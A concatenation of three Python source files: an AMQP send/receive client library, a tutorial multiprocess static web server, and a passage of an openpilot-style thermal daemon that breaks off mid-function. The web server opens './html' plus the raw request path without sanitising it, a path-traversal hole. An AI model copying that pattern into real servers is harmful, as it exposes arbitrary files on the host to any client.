elapsed_time = (current_time - message.idle_time)
if self._msg_timeout > 0 and elapsed_time > self._msg_timeout:
return None
return self._msg_timeout - elapsed_time if self._msg_timeout > 0 else 0
def _transfer_message(self, message, timeout):
sent = self.message_handler.send(message, self._on_message_sent, timeout=timeout)
if not sent:
_logger.info("Message not sent, raising RuntimeError.")
raise RuntimeError("Message sender failed to add message data to outgoing queue.")
def _filter_pending(self):
filtered = []
for message in self._pending_messages:
if message.state in constants.DONE_STATES:
continue
elif message.state == constants.MessageState.WaitingForSendAck:
self._waiting_messages += 1
elif message.state == constants.MessageState.WaitingToBeSent:
message.state = constants.MessageState.WaitingForSendAck
try:
timeout = self._get_msg_timeout(message)
if timeout is None:
self._on_message_sent(message, constants.MessageSendResult.Timeout)
if message.state != constants.MessageState.WaitingToBeSent:
continue
else:
self._transfer_message(message, timeout)
except Exception as exp: # pylint: disable=broad-except
self._on_message_sent(message, constants.MessageSendResult.Error, delivery_state=exp)
if message.state != constants.MessageState.WaitingToBeSent:
continue
filtered.append(message)
return filtered
def _client_run(self):
"""MessageSender Link is now open - perform message send
on all pending messages.
Will return True if operation successful and client can remain open for
further work.
:rtype: bool
"""
# pylint: disable=protected-access
self.message_handler.work()
self._waiting_messages = 0
self._pending_messages = self._filter_pending()
if self._backoff and not self._waiting_messages:
_logger.info("Client told to backoff - sleeping for %r seconds", self._backoff)
self._connection.sleep(self._backoff)
self._backoff = 0
self._connection.work()
return True
@property
def _message_sender(self):
"""Temporary property to support backwards compatibility
with EventHubs.
"""
return self.message_handler
@property
def pending_messages(self):
return [m for m in self._pending_messages if m.state in constants.PENDING_STATES]
def redirect(self, redirect, auth):
"""Redirect the client endpoint using a Link DETACH redirect
response.
:param redirect: The Link DETACH redirect details.
:type redirect: ~uamqp.errors.LinkRedirect
:param auth: Authentication credentials to the redirected endpoint.
:type auth: ~uamqp.authentication.common.AMQPAuth
"""
if self._ext_connection:
raise ValueError(
"Clients with a shared connection cannot be "
"automatically redirected.")
if self.message_handler:
self.message_handler.destroy()
self.message_handler = None
self._pending_messages = []
self._remote_address = address.Target(redirect.address)
self._redirect(redirect, auth)
def queue_message(self, *messages):
"""Add one or more messages to the send queue.
No further action will be taken until either `SendClient.wait()`
or `SendClient.send_all_messages()` has been called.
The client does not need to be open yet for messages to be added
to the queue. Multiple messages can be queued at once:
- `send_client.queue_message(my_message)`
- `send_client.queue_message(message_1, message_2, message_3)`
- `send_client.queue_message(*my_message_list)`
:param messages: A message to send. This can either be a single instance
of `Message`, or multiple messages wrapped in an instance of `BatchMessage`.
:type messages: ~uamqp.message.Message
"""
for message in messages:
for internal_message in message.gather():
internal_message.idle_time = self._counter.get_current_ms()
internal_message.state = constants.MessageState.WaitingToBeSent
self._pending_messages.append(internal_message)
def send_message(self, messages, close_on_done=False):
"""Send a single message or batched message.
:param messages: A message to send. This can either be a single instance
of `Message`, or multiple messages wrapped in an instance of `BatchMessage`.
:type messages: ~uamqp.message.Message
:param close_on_done: Close the client once the message is sent. Default is `False`.
:type close_on_done: bool
:raises: ~uamqp.errors.MessageException if message fails to send after retry policy
is exhausted.
"""
batch = messages.gather()
pending_batch = []
for message in batch:
message.idle_time = self._counter.get_current_ms()
self._pending_messages.append(message)
pending_batch.append(message)
self.open()
running = True
try:
while running and any([m for m in pending_batch if m.state not in constants.DONE_STATES]):
running = self.do_work()
failed = [m for m in pending_batch if m.state == constants.MessageState.SendFailed]
if any(failed):
details = {"total_messages": len(pending_batch), "number_failed": len(failed)}
details['failed_messages'] = {}
exception = None
for failed_message in failed:
exception = failed_message._response # pylint: disable=protected-access
details['failed_messages'][failed_message] = exception
raise errors.ClientMessageError(exception, info=details)
finally:
if close_on_done or not running:
self.close()
def messages_pending(self):
"""Check whether the client is holding any unsent
messages in the queue.
:rtype: bool
"""
return bool(self._pending_messages)
def wait(self):
"""Run the client until all pending message in the queue
have been processed. Returns whether the client is still running after the
messages have been processed, or whether a shutdown has been initiated.
:rtype: bool
"""
running = True
while running and self.messages_pending():
running = self.do_work()
return running
def send_all_messages(self, close_on_done=True):
"""Send all pending messages in the queue. This will return a list
of the send results of all the pending messages so it can be
determined if any messages failed to send.
This function will open the client if it is not already open.
:param close_on_done: Close the client once the messages are sent.
Default is `True`.
:type close_on_done: bool
:rtype: list[~uamqp.constants.MessageState]
"""
self.open()
running = True
try:
messages = self._pending_messages[:]
running = self.wait()
results = [m.state for m in messages]
return results
finally:
if close_on_done or not running:
self.close()
class ReceiveClient(AMQPClient):
"""An AMQP client for receiving messages.
:param source: The source AMQP service endpoint. This can either be the URI as
a string or a ~uamqp.address.Source object.
:type source: str, bytes or ~uamqp.address.Source
:param auth: Authentication for the connection. This should be one of the subclasses of
uamqp.authentication.AMQPAuth. Currently this includes:
- uamqp.authentication.SASLAnonymous
- uamqp.authentication.SASLPlain
- uamqp.authentication.SASTokenAuth
If no authentication is supplied, SASLAnonymous will be used by default.
:type auth: ~uamqp.authentication.common.AMQPAuth
:param client_name: The name for the client, also known as the Container ID.
If no name is provided, a random GUID will be used.
:type client_name: str or bytes
:param debug: Whether to turn on network trace logs. If `True`, trace logs
will be logged at INFO level. Default is `False`.
:type debug: bool
:param timeout: A timeout in milliseconds. The receiver will shut down if no
new messages are received after the specified timeout. If set to 0, the receiver
will never timeout and will continue to listen. The default is 0.
Set `shutdown_after_timeout` to `False` if keeping the receiver open after timeout is needed.
:type timeout: float
:param shutdown_after_timeout: Whether to automatically shutdown the receiver
if no new messages are received after the specified timeout. Default is `True`.
:type shutdown_after_timeout: bool
:param auto_complete: Whether to automatically settle messages received via callback
 or via iterator. If a message has not been explicitly settled after processing,
 it will be accepted. Alternatively, when used with batch receive, this setting
 determines whether the messages are pre-emptively settled during batching, or otherwise
 left to the user to settle explicitly.
:type auto_complete: bool
:param error_policy: A policy for parsing errors on link, connection and message
disposition to determine whether the error should be retryable.
:type error_policy: ~uamqp.errors.ErrorPolicy
:param keep_alive_interval: If set, a thread will be started to keep the connection
alive during periods of user inactivity. The value will determine how long the
thread will sleep (in seconds) between pinging the connection. If 0 or None, no
thread will be started.
:type keep_alive_interval: int
:param send_settle_mode: The mode by which to settle message send
operations. If set to `Unsettled`, the client will wait for a confirmation
from the service that the message was successfully sent. If set to 'Settled',
the client will not wait for confirmation and assume success.
:type send_settle_mode: ~uamqp.constants.SenderSettleMode
:param receive_settle_mode: The mode by which to settle message receive
operations. If set to `PeekLock`, the receiver will lock a message once received until
the client accepts or rejects the message. If set to `ReceiveAndDelete`, the service
will assume successful receipt of the message and clear it from the queue. The
default is `PeekLock`.
:type receive_settle_mode: ~uamqp.constants.ReceiverSettleMode
:param desired_capabilities: The extension capabilities desired from the peer endpoint.
To create a desired_capabilities object, do as follows:
- 1. Create an array of desired capability symbols: `capabilities_symbol_array = [types.AMQPSymbol(string)]`
- 2. Transform the array to AMQPValue object: `utils.data_factory(types.AMQPArray(capabilities_symbol_array))`
:type desired_capabilities: ~uamqp.c_uamqp.AMQPValue
:param max_message_size: The maximum allowed message size negotiated for the Link.
:type max_message_size: int
:param link_properties: Metadata to be sent in the Link ATTACH frame.
:type link_properties: dict
:param prefetch: The receiver Link credit that determines how many
messages the Link will attempt to handle per connection iteration.
The default is 300.
:type prefetch: int
:param max_frame_size: Maximum AMQP frame size. Default is 63488 bytes.
:type max_frame_size: int
:param channel_max: Maximum number of Session channels in the Connection.
:type channel_max: int
:param idle_timeout: Timeout in milliseconds after which the Connection will close
if there is no further activity.
:type idle_timeout: int
:param properties: Connection properties.
:type properties: dict
:param remote_idle_timeout_empty_frame_send_ratio: Ratio of empty frames to
idle time for Connections with no activity. Value must be between
0.0 and 1.0 inclusive. Default is 0.5.
:type remote_idle_timeout_empty_frame_send_ratio: float
:param incoming_window: The size of the allowed window for incoming messages.
:type incoming_window: int
:param outgoing_window: The size of the allowed window for outgoing messages.
:type outgoing_window: int
:param handle_max: The maximum number of concurrent link handles.
:type handle_max: int
:param on_attach: A callback function to be run on receipt of an ATTACH frame.
The function must take 4 arguments: source, target, properties and error.
:type on_attach: func[~uamqp.address.Source, ~uamqp.address.Target, dict, ~uamqp.errors.AMQPConnectionError]
:param encoding: The encoding to use for parameters supplied as strings.
Default is 'UTF-8'
:type encoding: str
"""
def __init__(
self, source, auth=None, client_name=None, debug=False, timeout=0,
auto_complete=True, error_policy=None, **kwargs):
source = source if isinstance(source, address.Address) else address.Source(source)
self._timeout = timeout
self._last_activity_timestamp = None
self._was_message_received = False
self._message_received_callback = None
self._streaming_receive = False
self._received_messages = compat.queue.Queue()
self._shutdown_after_timeout = kwargs.pop('shutdown_after_timeout', True)
self._timeout_reached = False
# Receiver and Link settings
self._max_message_size = kwargs.pop('max_message_size', None) or constants.MAX_MESSAGE_LENGTH_BYTES
self._prefetch = kwargs.pop('prefetch', None) or 300
self._link_properties = kwargs.pop('link_properties', None)
# AMQP object settings
self.receiver_type = receiver.MessageReceiver
self.auto_complete = auto_complete
super(ReceiveClient, self).__init__(
source, auth=auth, client_name=client_name, error_policy=error_policy, debug=debug, **kwargs)
@property
def _message_receiver(self):
"""Temporary property to support backwards compatibility
with EventHubs.
"""
return self.message_handler
def _client_ready(self):
"""Determine whether the client is ready to start receiving messages.
To be ready, the connection must be open and authentication complete,
The Session, Link and MessageReceiver must be open and in non-errored
states.
:rtype: bool
:raises: ~uamqp.errors.MessageHandlerError if the MessageReceiver
goes into an error state.
"""
# pylint: disable=protected-access
if not self.message_handler:
self.message_handler = self.receiver_type(
self._session, self._remote_address, self._name,
on_message_received=self._message_received,
name='receiver-link-{}'.format(uuid.uuid4()),
debug=self._debug_trace,
receive_settle_mode=self._receive_settle_mode,
send_settle_mode=self._send_settle_mode,
prefetch=self._prefetch,
max_message_size=self._max_message_size,
properties=self._link_properties,
error_policy=self._error_policy,
encoding=self._encoding,
desired_capabilities=self._desired_capabilities)
self.message_handler.open()
return False
if self.message_handler.get_state() == constants.MessageReceiverState.Error:
raise errors.MessageHandlerError(
"Message Receiver Client is in an error state. "
"Please confirm credentials and access permissions."
"\nSee debug trace for more details.")
if self.message_handler.get_state() != constants.MessageReceiverState.Open:
self._last_activity_timestamp = self._counter.get_current_ms()
return False
return True
def _client_run(self):
"""MessageReceiver Link is now open - start receiving messages.
Will return True if operation successful and client can remain open for
further work.
:rtype: bool
"""
self.message_handler.work()
self._connection.work()
now = self._counter.get_current_ms()
if self._last_activity_timestamp and not self._was_message_received:
# If no messages are coming through, back off a little to keep CPU use low.
time.sleep(0.05)
if self._timeout > 0:
timespan = now - self._last_activity_timestamp
if timespan >= self._timeout:
self._timeout_reached = True
if self._shutdown_after_timeout:
_logger.info("Timeout reached, closing receiver.")
self._shutdown = True
else:
self._last_activity_timestamp = None # To reuse the receiver, reset the timestamp
_logger.info("Timeout reached, keeping receiver open.")
else:
self._last_activity_timestamp = now
self._was_message_received = False
return True
def _complete_message(self, message, auto): # pylint: disable=no-self-use
if not message or not auto:
return
message.accept()
def _message_generator(self):
"""Iterate over processed messages in the receive queue.
:rtype: generator[~uamqp.message.Message]
"""
self.open()
auto_complete = self.auto_complete
self.auto_complete = False
self._timeout_reached = False
self._last_activity_timestamp = None
receiving = True
message = None
try:
while receiving and not self._timeout_reached:
while receiving and self._received_messages.empty() and not self._timeout_reached:
receiving = self.do_work()
while not self._received_messages.empty():
message = self._received_messages.get()
self._received_messages.task_done()
yield message
self._complete_message(message, auto_complete)
finally:
self._complete_message(message, auto_complete)
self.auto_complete = auto_complete
if self._shutdown_after_timeout:
self.close()
def _message_received(self, message):
"""Callback run on receipt of every message. If there is
a user-defined callback, this will be called.
Additionally if the client is retrieving messages for a batch
or iterator, the message will be added to an internal queue.
:param message: Received message.
:type message: ~uamqp.message.Message
"""
self._was_message_received = True
if self._message_received_callback:
self._message_received_callback(message)
self._complete_message(message, self.auto_complete)
if not self._streaming_receive:
self._received_messages.put(message)
elif not message.settled:
# Message was received with callback processing and wasn't settled.
_logger.info("Message was not settled.")
def receive_message_batch(self, max_batch_size=None, on_message_received=None, timeout=0):
"""Receive a batch of messages. Messages returned in the batch have already been
accepted - if you wish to add logic to accept or reject messages based on custom
criteria, pass in a callback. This method will return as soon as some messages are
available rather than waiting to achieve a specific batch size, and therefore the
number of messages returned per call will vary up to the maximum allowed.
If the receive client is configured with `auto_complete=True` then the messages received
in the batch returned by this function will already be settled. Alternatively, if
`auto_complete=False`, then each message will need to be explicitly settled before
it expires and is released.
:param max_batch_size: The maximum number of messages that can be returned in
one call. This value cannot be larger than the prefetch value, and if not specified,
the prefetch value will be used.
:type max_batch_size: int
:param on_message_received: A callback to process messages as they arrive from the
service. It takes a single argument, a ~uamqp.message.Message object.
:type on_message_received: callable[~uamqp.message.Message]
:param timeout: A timeout in milliseconds for which to wait to receive any messages.
If no messages are received in this time, an empty list will be returned. If set to
0, the client will continue to wait until at least one message is received. The
default is 0.
:type timeout: float
"""
self._message_received_callback = on_message_received
max_batch_size = max_batch_size or self._prefetch
if max_batch_size > self._prefetch:
raise ValueError(
'Maximum batch size cannot be greater than the '
'connection link credit: {}'.format(self._prefetch))
timeout = self._counter.get_current_ms() + timeout if timeout else 0
expired = False
self.open()
receiving = True
batch = []
while not self._received_messages.empty() and len(batch) < max_batch_size:
batch.append(self._received_messages.get())
self._received_messages.task_done()
if len(batch) >= max_batch_size:
return batch
self._timeout_reached = False
self._last_activity_timestamp = None
while receiving and not expired and len(batch) < max_batch_size and not self._timeout_reached:
while receiving and self._received_messages.qsize() < max_batch_size and not self._timeout_reached:
if timeout and self._counter.get_current_ms() > timeout:
expired = True
break
before = self._received_messages.qsize()
receiving = self.do_work()
received = self._received_messages.qsize() - before
if self._received_messages.qsize() > 0 and received == 0:
# No new messages arrived, but we have some - so return what we have.
expired = True
break
while not self._received_messages.empty() and len(batch) < max_batch_size:
batch.append(self._received_messages.get())
self._received_messages.task_done()
return batch
def receive_messages(self, on_message_received):
"""Receive messages. This function will run indefinitely, until the client
closes either via timeout, error or forced interruption (e.g. keyboard interrupt).
If the receive client is configured with `auto_complete=True` then the messages that
have not been settled on completion of the provided callback will automatically be
accepted provided it has not expired. If an error occurs or the message has expired
it will be released. Alternatively if `auto_complete=False`, each message will need
to be explicitly settled during the callback, otherwise it will be released.
:param on_message_received: A callback to process messages as they arrive from the
service. It takes a single argument, a ~uamqp.message.Message object.
:type on_message_received: callable[~uamqp.message.Message]
"""
self._streaming_receive = True
self.open()
self._message_received_callback = on_message_received
self._timeout_reached = False
self._last_activity_timestamp = None
receiving = True
try:
while receiving and not self._timeout_reached:
receiving = self.do_work()
receiving = False
except:
receiving = False
raise
finally:
self._streaming_receive = False
if not receiving and self._shutdown_after_timeout:
self.close()
def receive_messages_iter(self, on_message_received=None):
"""Receive messages by generator. Messages returned in the generator have already been
accepted - if you wish to add logic to accept or reject messages based on custom
criteria, pass in a callback.
:param on_message_received: A callback to process messages as they arrive from the
service. It takes a single argument, a ~uamqp.message.Message object.
:type on_message_received: callable[~uamqp.message.Message]
"""
self._message_received_callback = on_message_received
return self._message_generator()
def redirect(self, redirect, auth):
"""Redirect the client endpoint using a Link DETACH redirect
response.
:param redirect: The Link DETACH redirect details.
:type redirect: ~uamqp.errors.LinkRedirect
:param auth: Authentication credentials to the redirected endpoint.
:type auth: ~uamqp.authentication.common.AMQPAuth
"""
if self._ext_connection:
raise ValueError(
"Clients with a shared connection cannot be "
"automatically redirected.")
if self.message_handler:
self.message_handler.destroy()
self.message_handler = None
self._shutdown = False
self._last_activity_timestamp = None
self._was_message_received = False
self._received_messages = compat.queue.Queue()
self._remote_address = address.Source(redirect.address)
self._redirect(redirect, auth)
|
multiprocess_web_server.py
|
#!/usr/bin/python3
# file: multiprocess_web_server.py
# Created by Guang at 19-7-19
# description:
# -*- coding: utf-8 -*-
import multiprocessing
import socket
import re
def service_client(new_socket):
"""为这个客户端返回数据"""
# 1. Receive the request sent by the browser, i.e. the HTTP request
# GET / HTTP/1.1
request = new_socket.recv(1024).decode('utf-8')
# print("-" * 100)
# print(request)
request_lines = request.splitlines()  # when the client closes the connection, recv() unblocks with an empty string, which produces an empty list here
if not request_lines:
return
# print(request_lines)
# GET /index.html HTTP/1.1
# GET POST DELETE
file_name = ""
ret = re.match(r'[^/]+(/[^ ]*)', request_lines[0])
if ret:
file_name = ret.group(1)
print("*" * 50, file_name)
if file_name == "/":
file_name = "/index.html"
# 2. Return the data in HTTP format
try:
print("./html" + file_name)
f = open("./html" + file_name, 'rb')
except Exception as e:
response = "HTTP/1.1 404 NOT FOUND\r\n"
response += "\r\n"
response += "----------file not found --------"
new_socket.send(response.encode("utf-8"))
else:
html_content = f.read()
f.close()
# 2.1 Prepare the data to send to the browser -- header
response = "HTTP/1.1 200 OK\r\n"
response += "\r\n"
# 2.2 Prepare the data to send to the browser -- body
# response += "hahaha"
# Send the response header to the browser
new_socket.send(response.encode("utf-8"))
# Send the response body to the browser
new_socket.send(html_content)
# The socket must be closed here as well; at the OS level it is a file descriptor
new_socket.close()
def main():
"""主函数: 整体控制"""
# 1. Create the socket
listen_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listen_server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# 2. Bind the IP and port
local_addr = ("", 8888)
listen_server.bind(local_addr)
# 3. Switch the socket from active to passive (listening) mode and set the backlog length
listen_server.listen(128)
while True:
# 4. Wait for a new client connection
new_socket, client_addr = listen_server.accept()
# 5. Serve this client
p = multiprocessing.Process(target=service_client, args=(new_socket, ))
p.start()
# A process-based concurrent server must also call new_socket.close() here; the reason is file descriptors (fd):
# the child process has copied the parent's socket, so the parent's close() alone does not close the underlying connection
new_socket.close()
# Close the listening socket
listen_server.close()
if __name__ == '__main__':
main()
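# Hedged smoke test for the server above. Assumptions: the server is already running
# on localhost:8888 (started from another terminal) and ./html/index.html exists.
# Uses only the standard library; it is never called by the server itself.
def fetch(path="/index.html", host="127.0.0.1", port=8888):
    """Issue a single GET against the server and return (status, body bytes)."""
    import http.client
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("GET", path)
    resp = conn.getresponse()
    body = resp.read()  # the server sends no Content-Length, so read until it closes
    conn.close()
    return resp.status, body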
|
thermald.py
|
#!/usr/bin/env python3
import datetime
import os
import queue
import threading
import time
from collections import OrderedDict, namedtuple
from pathlib import Path
from typing import Dict, Optional, Tuple
import psutil
import cereal.messaging as messaging
from cereal import log
from common.dict_helpers import strip_deprecated_keys
from common.filter_simple import FirstOrderFilter
from common.params import Params
from common.realtime import DT_TRML, sec_since_boot
from selfdrive.controls.lib.alertmanager import set_offroad_alert
from selfdrive.hardware import EON, HARDWARE, PC, TICI
from selfdrive.loggerd.config import get_available_percent
from selfdrive.statsd import statlog
from selfdrive.swaglog import cloudlog
from selfdrive.thermald.power_monitoring import PowerMonitoring
from selfdrive.thermald.fan_controller import EonFanController, UnoFanController, TiciFanController
from selfdrive.version import terms_version, training_version
ThermalStatus = log.DeviceState.ThermalStatus
NetworkType = log.DeviceState.NetworkType
NetworkStrength = log.DeviceState.NetworkStrength
CURRENT_TAU = 15. # 15s time constant
TEMP_TAU = 5. # 5s time constant
DISCONNECT_TIMEOUT = 5. # wait 5 seconds before going offroad after disconnect so you get an alert
PANDA_STATES_TIMEOUT = int(1000 * 2.5 * DT_TRML) # 2.5x the expected pandaState frequency
ThermalBand = namedtuple("ThermalBand", ['min_temp', 'max_temp'])
HardwareState = namedtuple("HardwareState", ['network_type', 'network_metered', 'network_strength', 'network_info', 'nvme_temps', 'modem_temps', 'wifi_address'])
# List of thermal bands. We will stay within this region as long as we are within the bounds.
# When exiting the bounds, we'll jump to the lower or higher band. Bands are ordered in the dict.
THERMAL_BANDS = OrderedDict({
ThermalStatus.green: ThermalBand(None, 80.0),
ThermalStatus.yellow: ThermalBand(75.0, 96.0),
ThermalStatus.red: ThermalBand(80.0, 107.),
ThermalStatus.danger: ThermalBand(94.0, None),
})
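# Hedged illustration (a pure helper, not called by thermald_thread): one step of the
# band walk described above, using the same min/max hysteresis rule as the loop below.
def _example_band_step(thermal_status, max_comp_temp):
  statuses = list(THERMAL_BANDS.keys())
  band = THERMAL_BANDS[thermal_status]
  idx = statuses.index(thermal_status)
  if band.min_temp is not None and max_comp_temp < band.min_temp:
    return statuses[idx - 1]  # cooled below this band's floor: drop one band
  if band.max_temp is not None and max_comp_temp > band.max_temp:
    return statuses[idx + 1]  # exceeded this band's ceiling: jump one band up
  return thermal_status       # within bounds: stay in the current band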
# Override to highest thermal band when offroad and above this temp
OFFROAD_DANGER_TEMP = 79.5 if TICI else 70.0
prev_offroad_states: Dict[str, Tuple[bool, Optional[str]]] = {}
tz_by_type: Optional[Dict[str, int]] = None
def populate_tz_by_type():
global tz_by_type
tz_by_type = {}
for n in os.listdir("/sys/devices/virtual/thermal"):
if not n.startswith("thermal_zone"):
continue
with open(os.path.join("/sys/devices/virtual/thermal", n, "type")) as f:
tz_by_type[f.read().strip()] = int(n.lstrip("thermal_zone"))
def read_tz(x):
if x is None:
return 0
if isinstance(x, str):
if tz_by_type is None:
populate_tz_by_type()
x = tz_by_type[x]
try:
with open(f"/sys/devices/virtual/thermal/thermal_zone{x}/temp") as f:
return int(f.read())
except FileNotFoundError:
return 0
prebuiltfile = '/data/openpilot/prebuilt'
def read_thermal(thermal_config):
dat = messaging.new_message('deviceState')
dat.deviceState.cpuTempC = [read_tz(z) / thermal_config.cpu[1] for z in thermal_config.cpu[0]]
dat.deviceState.gpuTempC = [read_tz(z) / thermal_config.gpu[1] for z in thermal_config.gpu[0]]
dat.deviceState.memoryTempC = read_tz(thermal_config.mem[0]) / thermal_config.mem[1]
dat.deviceState.ambientTempC = read_tz(thermal_config.ambient[0]) / thermal_config.ambient[1]
dat.deviceState.pmicTempC = [read_tz(z) / thermal_config.pmic[1] for z in thermal_config.pmic[0]]
return dat
def set_offroad_alert_if_changed(offroad_alert: str, show_alert: bool, extra_text: Optional[str]=None):
if prev_offroad_states.get(offroad_alert, None) == (show_alert, extra_text):
return
prev_offroad_states[offroad_alert] = (show_alert, extra_text)
set_offroad_alert(offroad_alert, show_alert, extra_text)
def hw_state_thread(end_event, hw_queue):
"""Handles non critical hardware state, and sends over queue"""
count = 0
registered_count = 0
prev_hw_state = None
modem_version = None
modem_nv = None
modem_configured = False
while not end_event.is_set():
# these are expensive calls. update every 10s
if (count % int(10. / DT_TRML)) == 0:
try:
network_type = HARDWARE.get_network_type()
modem_temps = HARDWARE.get_modem_temperatures()
if len(modem_temps) == 0 and prev_hw_state is not None:
modem_temps = prev_hw_state.modem_temps
# Log modem version once
if TICI and ((modem_version is None) or (modem_nv is None)):
modem_version = HARDWARE.get_modem_version() # pylint: disable=assignment-from-none
modem_nv = HARDWARE.get_modem_nv() # pylint: disable=assignment-from-none
if (modem_version is not None) and (modem_nv is not None):
cloudlog.event("modem version", version=modem_version, nv=modem_nv)
hw_state = HardwareState(
network_type=network_type,
network_metered=HARDWARE.get_network_metered(network_type),
network_strength=HARDWARE.get_network_strength(network_type),
network_info=HARDWARE.get_network_info(),
nvme_temps=HARDWARE.get_nvme_temperatures(),
modem_temps=modem_temps,
wifi_address=HARDWARE.get_ip_address(),
)
try:
hw_queue.put_nowait(hw_state)
except queue.Full:
pass
if TICI and (hw_state.network_info is not None) and (hw_state.network_info.get('state', None) == "REGISTERED"):
registered_count += 1
else:
registered_count = 0
if registered_count > 10:
cloudlog.warning(f"Modem stuck in registered state {hw_state.network_info}. nmcli conn up lte")
os.system("nmcli conn up lte")
registered_count = 0
# TODO: remove this once the config is in AGNOS
if not modem_configured and len(HARDWARE.get_sim_info().get('sim_id', '')) > 0:
cloudlog.warning("configuring modem")
HARDWARE.configure_modem()
modem_configured = True
prev_hw_state = hw_state
except Exception:
cloudlog.exception("Error getting hardware state")
count += 1
time.sleep(DT_TRML)
def thermald_thread(end_event, hw_queue):
pm = messaging.PubMaster(['deviceState'])
sm = messaging.SubMaster(["peripheralState", "gpsLocationExternal", "controlsState", "pandaStates"], poll=["pandaStates"])
count = 0
onroad_conditions: Dict[str, bool] = {
"ignition": False,
}
startup_conditions: Dict[str, bool] = {}
startup_conditions_prev: Dict[str, bool] = {}
off_ts = None
started_ts = None
started_seen = False
thermal_status = ThermalStatus.green
usb_power = True
last_hw_state = HardwareState(
network_type=NetworkType.none,
network_metered=False,
network_strength=NetworkStrength.unknown,
network_info=None,
nvme_temps=[],
modem_temps=[],
wifi_address='N/A',
)
current_filter = FirstOrderFilter(0., CURRENT_TAU, DT_TRML)
temp_filter = FirstOrderFilter(0., TEMP_TAU, DT_TRML)
should_start_prev = False
in_car = False
is_uno = False
engaged_prev = False
params = Params()
power_monitor = PowerMonitoring()
HARDWARE.initialize_hardware()
thermal_config = HARDWARE.get_thermal_config()
fan_controller = None
restart_triggered_ts = 0.
panda_state_ts = 0.
while not end_event.is_set():
sm.update(PANDA_STATES_TIMEOUT)
pandaStates = sm['pandaStates']
peripheralState = sm['peripheralState']
msg = read_thermal(thermal_config)
# neokii
if sec_since_boot() - restart_triggered_ts < 5.:
onroad_conditions["not_restart_triggered"] = False
else:
onroad_conditions["not_restart_triggered"] = True
if params.get_bool("SoftRestartTriggered"):
params.put_bool("SoftRestartTriggered", False)
restart_triggered_ts = sec_since_boot()
if sm.updated['pandaStates'] and len(pandaStates) > 0:
# Set ignition based on any panda connected
onroad_conditions["ignition"] = any(ps.ignitionLine or ps.ignitionCan for ps in pandaStates if ps.pandaType != log.PandaState.PandaType.unknown)
pandaState = pandaStates[0]
if pandaState.pandaType != log.PandaState.PandaType.unknown:
panda_state_ts = sec_since_boot()
in_car = pandaState.harnessStatus != log.PandaState.HarnessStatus.notConnected
usb_power = peripheralState.usbPowerMode != log.PeripheralState.UsbPowerMode.client
# Setup fan handler on first connect to panda
if fan_controller is None and peripheralState.pandaType != log.PandaState.PandaType.unknown:
is_uno = peripheralState.pandaType == log.PandaState.PandaType.uno
if TICI:
fan_controller = TiciFanController()
elif is_uno or PC:
fan_controller = UnoFanController()
else:
fan_controller = EonFanController()
else:
if sec_since_boot() - panda_state_ts > 3.:
if onroad_conditions["ignition"]:
cloudlog.error("Lost panda connection while onroad")
onroad_conditions["ignition"] = False
try:
last_hw_state = hw_queue.get_nowait()
except queue.Empty:
pass
msg.deviceState.freeSpacePercent = get_available_percent(default=100.0)
msg.deviceState.memoryUsagePercent = int(round(psutil.virtual_memory().percent))
msg.deviceState.cpuUsagePercent = [int(round(n)) for n in psutil.cpu_percent(percpu=True)]
msg.deviceState.gpuUsagePercent = int(round(HARDWARE.get_gpu_usage_percent()))
msg.deviceState.networkType = last_hw_state.network_type
msg.deviceState.networkMetered = last_hw_state.network_metered
msg.deviceState.networkStrength = last_hw_state.network_strength
if last_hw_state.network_info is not None:
msg.deviceState.networkInfo = last_hw_state.network_info
msg.deviceState.nvmeTempC = last_hw_state.nvme_temps
msg.deviceState.modemTempC = last_hw_state.modem_temps
msg.deviceState.wifiIpAddress = last_hw_state.wifi_address
msg.deviceState.screenBrightnessPercent = HARDWARE.get_screen_brightness()
msg.deviceState.batteryPercent = HARDWARE.get_battery_capacity()
msg.deviceState.batteryCurrent = HARDWARE.get_battery_current()
msg.deviceState.usbOnline = HARDWARE.get_usb_present()
current_filter.update(msg.deviceState.batteryCurrent / 1e6)
max_comp_temp = temp_filter.update(
max(max(msg.deviceState.cpuTempC), msg.deviceState.memoryTempC, max(msg.deviceState.gpuTempC))
)
if fan_controller is not None:
msg.deviceState.fanSpeedPercentDesired = fan_controller.update(max_comp_temp, onroad_conditions["ignition"])
is_offroad_for_5_min = (started_ts is None) and ((not started_seen) or (off_ts is None) or (sec_since_boot() - off_ts > 60 * 5))
if is_offroad_for_5_min and max_comp_temp > OFFROAD_DANGER_TEMP:
# If device is offroad we want to cool down before going onroad
# since going onroad increases load and can make temps go over 107
thermal_status = ThermalStatus.danger
else:
current_band = THERMAL_BANDS[thermal_status]
band_idx = list(THERMAL_BANDS.keys()).index(thermal_status)
if current_band.min_temp is not None and max_comp_temp < current_band.min_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx - 1]
elif current_band.max_temp is not None and max_comp_temp > current_band.max_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx + 1]
# **** starting logic ****
# Ensure date/time are valid
now = datetime.datetime.utcnow()
startup_conditions["time_valid"] = True #(now.year > 2020) or (now.year == 2020 and now.month >= 10)
set_offroad_alert_if_changed("Offroad_InvalidTime", (not startup_conditions["time_valid"]))
startup_conditions["up_to_date"] = True #params.get("Offroad_ConnectivityNeeded") is None or params.get_bool("DisableUpdates") or params.get_bool("SnoozeUpdate")
startup_conditions["not_uninstalling"] = not params.get_bool("DoUninstall")
startup_conditions["accepted_terms"] = params.get("HasAcceptedTerms") == terms_version
# with 2% left, we killall, otherwise the phone will take a long time to boot
startup_conditions["free_space"] = msg.deviceState.freeSpacePercent > 2
startup_conditions["completed_training"] = params.get("CompletedTrainingVersion") == training_version or \
params.get_bool("Passive")
startup_conditions["not_driver_view"] = not params.get_bool("IsDriverViewEnabled")
startup_conditions["not_taking_snapshot"] = not params.get_bool("IsTakingSnapshot")
# if any CPU gets above 107 or the battery gets above 63, kill all processes
# controls will warn with CPU above 95 or battery above 60
onroad_conditions["device_temp_good"] = thermal_status < ThermalStatus.danger
set_offroad_alert_if_changed("Offroad_TemperatureTooHigh", (not onroad_conditions["device_temp_good"]))
# TODO: this should move to TICI.initialize_hardware, but we currently can't import params there
if TICI:
if not os.path.isfile("/persist/comma/living-in-the-moment"):
if not Path("/data/media").is_mount():
set_offroad_alert_if_changed("Offroad_StorageMissing", True)
else:
# check for bad NVMe
try:
with open("/sys/block/nvme0n1/device/model") as f:
model = f.read().strip()
